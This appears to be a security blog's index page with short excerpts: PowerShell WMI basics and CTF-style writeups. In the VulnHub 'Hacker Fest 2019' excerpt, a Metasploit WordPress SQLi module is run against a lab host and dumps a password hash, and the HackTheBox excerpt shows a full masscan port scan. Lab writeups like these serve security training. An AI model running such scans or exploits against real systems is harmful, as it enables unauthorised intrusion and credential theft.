Powershell * WMI

Classes Remove an Object

WMI returns live, editable objects, so please be careful when removing an object:
PS C:\Windows\system32> Get-WmiObject -Class win32_process | where-object {$_.Name -eq "notepad.exe"} | Remove-WmiObject
PS C:\Windows\system32> Get-CimInstance -ClassName win32_process -Filter "Name = 'notepad.exe'" | remove-ciminstance
PS C:\Windows\system32> Get-WmiObject -class win32_process -filter 'Name = "calculator.exe"'
PS C:\Windows\system32> Get-WmiObject -class win32_process -list
Exploring Methods: Find all…

HACKTHEBOX * Vulnerable Machine Writeup

SAFE (HACKTHEBOX)

root@kali:~/Downloads# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.147 --rate=1000
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2019-10-28 04:48:17 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 1337/tcp on 10.10.10.147
Discovered open port 22/tcp on 10.10.10.147
Discovered open port 80/tcp on 10.10.10.147
^Zte: 0.00-kpps, 100.00% done, waiting -13-secs, found=3
[2]+…

Vulnerable Machine Writeup * VULNHUB

HACKER FEST 2019 (VULNHUB)

Vulnhub Link: https://download.vulnhub.com/hackerfest/HF2019-Linux.ova
root@kali:~# nmap -A 192.168.0.20
Ports: 21, 22, 80, 10000
Enumeration: http://192.168.0.20
Now on the terminal:
root@kali:~# wpscan --url http://192.168.0.20/
WordPress Google Maps SQLi exploit:
msf5 > use auxiliary/admin/http/wp_google_maps_sqli
msf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 192.168.0.20
msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit
We get the output:
webmaster $P$Bsq0diLTcye6ASlofreys4GzRlRvSrl
root@kali:~# gedit hash
webmaster…

Powershell * RED TEAM SECURITY

PowerShell Beginner

PowerShell help system:
List everything which contains the word process:
PS C:\Users\victim6\Downloads\new\new> get-help *process*
PS C:\Users\victim6\Downloads\new\new> get-help about_*
PS C:\Users\victim6\Downloads\new\new> $psversiontable
PS C:\Users\victim6\Downloads\new\new> get-help Get-Process -Parameter name
PS C:\Users\victim6\Downloads\new\new> get-help *
Update the help system (v3+):
PS C:\Users\victim6\Downloads\new\new> update-help
List full help about a topic:
PS C:\Users\victim6\Downloads\new\new> get-help get-item
Lists examples of how…